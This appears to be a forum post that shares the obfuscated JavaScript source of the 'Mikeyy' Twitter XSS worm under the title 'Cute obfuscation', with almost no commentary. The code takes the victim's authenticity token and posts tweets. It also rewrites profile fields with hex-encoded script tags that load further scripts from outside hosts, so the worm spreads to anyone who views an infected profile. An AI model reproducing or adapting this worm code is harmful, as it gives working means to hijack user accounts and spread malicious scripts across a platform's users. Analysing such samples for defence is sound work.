Cute obfuscation
var _0xc26a = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP", "connect", "toUpperCase", "GET", "?", "open", "", "Method", "POST ", " HTTP/1.1", "setRequestHeader", "Content-Type", "application/x-www-form-urlencoded", "onreadystatechange", "readyState", "send", "split", "join", "'", "%27", "(", "%28", ")", "%29", "*", "%2A", "~", "%7E", "!", "%21", "%20", "+", "%", "replace", "innerHTML", "documentElement", "exec", "Twitter should really fix this... Mikeyy", "I am done... Mikeyy", "Mikeyy is done..", "Twitter please fix this, regards Mikeyy", "random", "length", "floor", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%78%73%73%6a%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%62%61%6d%62%61%6d%79%6f%2e%31%31%30%6d%62%2e%63%6f%6d%2f%77%6f%6d%70%77%6f%6d%70%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "/status/update", "POST", "authenticity_token=", "&status=", "&return_rendered_status=true&twttr=true", "/account/settings", "&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]=", "&tab=home&update=update", "/account/profile_settings", "&user[profile_default]=false&tab=none&profile_theme=0&user[profile_use_background_image]=0&user[profile_background_tile]=0&user[profile_link_color]=", "&commit=save+changes", "wait()""];
function XHConn(){
var _0x6687x2,_0x6687x3=false;
try{ _0x6687x2= new ActiveXObject(_0xc26a[0x0]); }
catch(e) { try{ _0x6687x2= new ActiveXObject(_0xc26a[0x1]); }
catch(e) { try { _0x6687x2= new XMLHttpRequest(); }
catch(e) { _0x6687x2=false; }; }; };
if (!_0x6687x2) { return null; } ;
this[_0xc26a[0x2]]=function (_0x6687x4,_0x6687x5,_0x6687x6,_0x6687x7) {
if (!_0x6687x2) { return false; };
_0x6687x3=false;
_0x6687x5=_0x6687x5[_0xc26a[0x3]]();
try {
if(_0x6687x5==_0xc26a[0x4]) {
_0x6687x2[_0xc26a[0x6]](_0x6687x5,_0x6687x4+_0xc26a[0x5]+_0x6687x6,true);
_0x6687x6=_0xc26a[0x7];
} else {
_0x6687x2[_0xc26a[0x6]](_0x6687x5,_0x6687x4,true);
_0x6687x2[_0xc26a[0xb]](_0xc26a[0x8],_0xc26a[0x9]+_0x6687x4+_0xc26a[0xa]);
_0x6687x2[_0xc26a[0xb]](_0xc26a[0xc],_0xc26a[0xd]);
} ;
_0x6687x2[_0xc26a[0xe]]=function () {
if (_0x6687x2[_0xc26a[0xf]]==0x4&&!_0x6687x3) {
_0x6687x3=true;
_0x6687x7(_0x6687x2);
} ;
} ;
_0x6687x2[_0xc26a[0x10]](_0x6687x6);
} catch(z) {
return false;
} ;
return true;
} ;
return this;
} ;
function urlencode(_0x6687x9) {
var _0x6687xa={},_0x6687xb=[];
var _0x6687xc=_0x6687x9.toString();
var _0x6687xd=function (_0x6687xe,_0x6687xf,_0x6687x9) {
var _0x6687xb=[];
_0x6687xb=_0x6687x9[_0xc26a[0x11]](_0x6687xe);
return _0x6687xb[_0xc26a[0x12]](_0x6687xf);
} ;
_0x6687xa[_0xc26a[0x13]]=_0xc26a[0x14];
_0x6687xa[_0xc26a[0x15]]=_0xc26a[0x16];
_0x6687xa[_0xc26a[0x17]]=_0xc26a[0x18];
_0x6687xa[_0xc26a[0x19]]=_0xc26a[0x1a];
_0x6687xa[_0xc26a[0x1b]]=_0xc26a[0x1c];
_0x6687xa[_0xc26a[0x1d]]=_0xc26a[0x1e];
_0x6687xa[_0xc26a[0x1f]]=_0xc26a[0x20];
_0x6687xc=encodeURIComponent(_0x6687xc);
for (search in _0x6687xa) {
replace=_0x6687xa[search];
_0x6687xc=_0x6687xd(search,replace,_0x6687xc);
} ;
return _0x6687xc[_0xc26a[0x22]](/(\%([a-z0-9]{2}))/g,function (_0x6687x10,_0x6687x11,_0x6687x12) {
return _0xc26a[0x21]+_0x6687x12[_0xc26a[0x3]]();
} );
return _0x6687xc;
} ;
function wait() {
var _0x6687x14=document[_0xc26a[0x24]][_0xc26a[0x23]];
authreg= new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
var _0x6687x15=authreg[_0xc26a[0x25]](_0x6687x14);
_0x6687x15=_0x6687x15[0x1];
var _0x6687x16= new Array();
_0x6687x16[0x0]=_0xc26a[0x26];
_0x6687x16[0x1]=_0xc26a[0x27];
_0x6687x16[0x2]=_0xc26a[0x28];
_0x6687x16[0x3]=_0xc26a[0x29];
var _0x6687x17=_0x6687x16[Math[_0xc26a[0x2c]](Math[_0xc26a[0x2a]]()*_0x6687x16[_0xc26a[0x2b]])];
var _0x6687x18=urlencode(_0x6687x17);
var _0x6687x19= new Array();
_0x6687x19[0x0]=_0xc26a[0x2d];
_0x6687x19[0x1]=_0xc26a[0x2e];
_0x6687x19[0x2]=_0xc26a[0x2f];
var _0x6687x1a=_0x6687x19[Math[_0xc26a[0x2c]](Math[_0xc26a[0x2a]]()*_0x6687x19[_0xc26a[0x2b]])];
var _0x6687x1b=urlencode(_0x6687x1a);
var _0x6687x1c= new XHConn();
_0x6687x1c[_0xc26a[0x2]](_0xc26a[0x30],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x33]+_0x6687x18+_0xc26a[0x34]);
var _0x6687x1d= new XHConn();
_0x6687x1d[_0xc26a[0x2]](_0xc26a[0x35],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x36]+_0x6687x1b+_0xc26a[0x37]);
var _0x6687x1e= new XHConn();
_0x6687x1e[_0xc26a[0x2]](_0xc26a[0x38],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x39]+_0x6687x1b+_0xc26a[0x3a]);
var _0x6687x1f= new XHConn();
_0x6687x1f[_0xc26a[0x2]](_0xc26a[0x35],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x36]+_0x6687x1b+_0xc26a[0x37]);
var _0x6687x20= new XHConn();
_0x6687x20[_0xc26a[0x2]](_0xc26a[0x38],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x39]+_0x6687x1b+_0xc26a[0x3a]);
var _0x6687x21= new XHConn();
_0x6687x21[_0xc26a[0x2]](_0xc26a[0x35],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x36]+_0x6687x1b+_0xc26a[0x37]);
var _0x6687x22= new XHConn();
_0x6687x22[_0xc26a[0x2]](_0xc26a[0x38],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x39]+_0x6687x1b+_0xc26a[0x3a]);
} ;
setTimeout(_0xc26a[0x3b],0xdac);
</pre> RE: Another Ajax powered XSS worm |